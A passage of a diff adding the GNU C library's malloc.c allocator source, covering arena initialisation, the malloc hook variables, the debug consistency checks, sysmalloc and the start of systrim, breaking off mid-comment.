+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
